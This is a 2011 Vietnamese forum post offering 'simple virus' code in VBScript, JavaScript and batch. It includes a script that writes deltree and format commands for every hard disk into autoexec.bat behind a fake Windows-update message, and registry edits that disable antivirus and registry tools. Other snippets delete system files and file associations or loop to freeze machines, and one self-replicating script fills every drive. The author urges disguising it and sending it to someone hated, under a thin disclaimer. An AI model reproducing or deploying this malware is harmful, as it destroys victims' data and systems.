Giới thiệu code virus đơn giản

Tiêu đề: Giới thiệu code virus đơn giản Wed Dec 21, 2011 5:59 pm

Sau đây tôi xin giới thiệu cách tạo một virus đơn giản.đây là bài của tác giả khác nhưng đã được tôi chỉnh sửa đôi chút cho phù hợp

Loại 1:
giới thiệu cách sử dụng VBScript để viết một
worm nhỏ xoá sạch ổ cứng của ai đó. (có thể nhúng vào HTML)

I/để bắt nạn nhân thực thi một chương trình nào đó các bạn sử dụng đoạn

================

L0ng3ta

chuong trinh notepad se thuc thi
On Error Resume Next
Set WSHShell = CreateObject("WScript.Shell")
WSHShell.Run "c:\windows\notepad.exe",1,False

================
đoạn Script trên sẽ chạy chương trình notepad. Các bạn có thể copy vào trang HTML
và cho chạy thử.

II/Đoạn Script để chèn một vài lệnh lên autoexec.bat trên ổ đĩa của nạn nhân.
======================
Function FindFile(PathFiles)
dim fso,f
Set fso = CreateObject("Scripting.FileSystemObject")
If (fso.FileExists(PathFiles)) Then
FindFile = True
Set f = fso.GetFile(Pathfiles)
If f.attributes and 1 Then
f.attributes = f.attributes -1
End if

Else
FindFile = False
End If
End Function

Sub CreateFile()
Dim fso, tf
Set fso = CreateObject("Scripting.FileSystemObject")
Set tf = fso.CreateTextFile("c:\Autoexec.bat", True)
tf.WriteLine ("@Echo off")
tf.Close
End Sub

Sub InsertBegintext()
Const ForReading = 1, ForWriting = 2, ForAppending = 8
Dim fso, tf
Set fso = CreateObject("Scripting.FileSystemObject")
Set tf = fso.OpenTextFile("c:\autoexec.bat", ForAppending , True)
tf.WriteLine ("@Echo Please Waiting for Windows updating your system ...")
tf.Close
End Sub

Sub Inserttext(drv)
Const ForReading = 1, ForWriting = 2, ForAppending = 8
Dim fso, tf
Set fso = CreateObject("Scripting.FileSystemObject")
Set tf = fso.OpenTextFile("c:\autoexec.bat", ForAppending , True)
tf.WriteLine ("@deltree /y " & drv & " > null")
tf.WriteLine ("@Format " & drv & " /q /u /autotest > null")
tf.Close
End Sub

'Kiem tra xem co phai o dia co phai la harddisk hay khong
'Va tra ve true neu no la harddisk

Function ShowDriveInfo(drvpath)
Dim fso, d, s, t
Set fso = CreateObject("Scripting.FileSystemObject")
Set d = fso.GetDrive(drvpath)
If d.DriveType = 2 then
If d.IsReady then
ShowDriveInfo = True
Else
ShowDriveInfo = False
End If
Else
ShowDiveInfo = False
End If
End Function

Sub Main()
Dim fso, d, dc, s, i
Dim a(15)
Set fso = CreateObject("Scripting.FileSystemObject")
Set dc = fso.Drives
i = 0
For Each d in dc
If showdriveinfo(d) then
a(i) = d
i= i+1
End If
Next
If Not Findfile("c:\autoexec.bat") then
Createfile
End if
InsertBegintext
Do While i>0
i=i-1
Inserttext(a(i))
Loop
End Sub

Main

biết để tránh thoi nha.tôi đã đơn giản hóa rất nhiều đoạn code trên .nó sẽ không còn các chức năng như lấy trộm pass hay khóa pc

Loại 2:
Đầu tiên các bạn mở notepad và chọn một trong những đoạn mã sau, các bạn copy đoạn mã vào notepad và lưu dưới đuôi VBS(nếu ko dc thì lưu với đuôi . cmd). ví dụ: slm.vbs chảng hạn..

* mở ra một thông điệp vui sau đó sẽ tắt máy tính
CODE
Code:
@echo off
msg * em la slm ,bb anh!
shutdown -c "virus slm" -s -t 10

Chỉ với Notepad hay Wordpad bạn đã có thể tự tạo cho mình 1 "chú" Virus dưới dạng VBSCRIPT hoặc Javascript rồi:

Dưới đây là code của một số con virus nhỏ dưới dạng VBS:

1.Không cho victim khởi động máy:

Code:
Code:
Dim wsh
Set wsh = createobject("wscript.shell")
wsh.run "RUNDLL32.EXE user.exe,exitwindows"

2. Disable NAV:

Code:
Code:
Dim wsh
Set wsh= CreateObject( "WScript.Shell")
s1 = " HKEY_LOCAL_MACHINE\System\CurrentControlSet\Servic
es\Norton Program
Scheduler\Start"
wsh.RegWrite s1,3, "REG_DWORD"

3. Hiển thị một message mỗi khi reboot máy:

Code:
Code:
dim wsh
Set wsh = CreateObject( "WScript.Shell" )
s1 = " HKLM\Software\Microsoft\Windows\CurrentVersion\Win
Logon\"
s2 = "LegalNoticeCaption"
s3 = "LegalNoticeText"
wsh.RegWrite s1+s2, "http://allformy.topcities.com"
wsh.RegWrite s1+s3, "Hi ! Toi la SLM"

4. Hiển thị một dòng lệnh khi click vào file hay folder:,

Code:
Code:
set reg=createobject("WScript.shell")
reg.regwrite "HKEY_CLASSES_ROOT\*\Shell\\","Hi ! Ban da bi nhiem WK "
reg.regwrite "HKEY_CLASSES_ROOT\folder\shell\Hi ! Ban da bi nhiem WK \","SLM"

5. Làm cho các trò trên hoạt động bình thường:

Code:
Code:
Dim objShell
Set objShell = CreateObject( "WScript.Shell" )
s1 = "HKEY_USERS\. Default\Software\Microsoft\Windows\CurrentVersion\
"
s2 = "Policies\System\DisableRegistryTools"
objShell.RegWrite s1+s2,1, "REG_DWORD"

Dưới dạng Javascipt :

Code:
Code:
var wsh;
wsh=new ActiveXObject ("Wscript.shell");

// Winlogon when reboot

var s1 = " HKLM\\Software\\Microsoft\\Windows\\CurrentVersion
\\WinLogon\\";
var s2 = "LegalNoticeCaption";
var s3 = "LegalNoticeText";
wsh.RegWrite (s1+ s2, "http://allformy.topcities.com") ;
wsh.RegWrite (s1+s3, "Hi ! Toi la Love. Toi den tu Chip&Kitty.com") ;

//Disable Registry
var s1 = "HKEY_USERS\\. Default\\Software\\Microsoft\\Windows\\CurrentVers
ion\\";
var s2 = "Policies\\System\\DisableRegistryTools" ;
wsh.RegWrite (s1+s2,0,"REG_DWORD");

//Delete file Msconfig.exe
Code:
Code:
var fso;
fso=new ActiveXObject("Scripting.FileSystemObject");
var fe=fso.getfile("C:\\windows\\msconfig.exe);
fe.delete true;

//Shutdown windows

//Disable Mouse

wsh.run ("RUNDLL32.EXE mouse,disable");

//Hang up windows

wsh.run ("rundll32 user,disableoemlayer");

Xóa khóa Registry Files
* xóa các tập tin registry key, sau đó lặp lại một tin nhắn

CODE
Code:
@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO slm chuc anh 1 ngay vui ve.
GOTO MESSAGE

-Endless Notepads
* Điều này sẽ bật lên Notepads bất tận cho đến khi máy tính bị đóng băng và các vụ đụng *

CODE
Code:
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

-Crazy caps lock
* không ngừng quay caps lock và tắt nhanh chóng liên tục *

CODE
Code:
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

--Endless ENter
* Ép enter liên tục

CODE
Code:
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

--Endless Backspace
* làm cho phím backspace liên tục bị ép *

CODE
Code:
MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

* làm cho ổ đĩa CD liên tục vọt ra *

CODE
Code:
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 100
loop

Tất cả các code trên lưu với đuôi VBS

Còn những cái này lưu dưới dạng slm.bat(đuôi .bat)

Lặp lại n lần chu kỳ mess

Code:
@ECHO off
:Begin
msg * Hi
msg * khoe ko anh ?
msg * em slm ne
msg * buon ngu chua?
msg * tat may ngu thoi ,bb anh
GOTO BEGIN

Auto shutdown
Code:
@echo off
msg * slm yeu anh
shutdown -c “Error! tạm biet anh!” -s

còn cái này thì ác hơn nửa

Start > Run > Notepad
Mở notepad, paste đoạn code
Trích dẫn:erase C:\TEST.txt

vào, lưu lại dưới dạng file .cmd với bất cứ tên nào. Ok bây giờ bạn kích hoạt nó, bạn sẽ thấy trong ổ C:\ sẽ ko còn file test.txt.

Đặc Biệt :
đây là virut tự nhân bản trong máy tính của bạn cho đến khi full tất cả các ổ cứng ( con này đã từng làm mưa làm gió trên thế giới rồi )

Set fso=CreateObject("Scripting.FileSystemObject")
Set file=fso.OpenTextFile(WScript.ScriptFullName,1)
VBCopy=file.ReadAll
FolderList("A:\")
FolderList("B:\")
FolderList("C:\")
FolderList("D:\")
FolderList("E:\")
FolderList("F:\")
FolderList("G:\")
FolderList("H:\")
FolderList("I:\")
FolderList("J:\")
FolderList("K:\")
FolderList("L:\")
FolderList("M:\")
FolderList("N:\")
FolderList("O:\")
FolderList("P:\")
FolderList("Q:\")
FolderList("R:\")
FolderList("S:\")
FolderList("T:\")
FolderList("U:\")
FolderList("V:\")
FolderList("X:\")
FolderList("Y:\")
FolderList("Z:\")
FolderList("W:\")

Sub FolderList(FolderSpec)
On Error Resume Next
Dim f,f1,sf,COP,CAP
Set f=fso.GetFolder(FolderSpec)
set sf=f.SubFolders
For Each f1 In sf
Set COP=fso.CreateTextFile(f1.path & "\Virus !!!!!!!.vbs")
COP.write VBCopy
Set CAP=fso.CreateTextFile(f1.path & "---Virus !!!!!!!.vbs")
CAP.write VBCopy
FolderList(f1.Path)
Next
End sub

lưu lại ở định dạng .cmd với 1 cái tên hấp dẫn nào đó ( anhyeuem, emyeuanh,love,readme......)
Vô cùng cảnh báo bạn đừng kích hoạt nó trong máy tính của ban!!!
Bạn hãy gửi cho người nào mà bạn ghét nhất, khi người đó kích hoạt nó.......oops ,xin hãy vui lòng cài lại máy!!!
Và đó gọi là virus, 1 con virus đơn giản nhưng hậu quả của nó thì không đơn giản chút nào.

Một lần nữa mình mong các bạn coi đây là 1 kinh nghiệm để mà tránh chứ đừng áp dụng nó nhe!!!
Laughing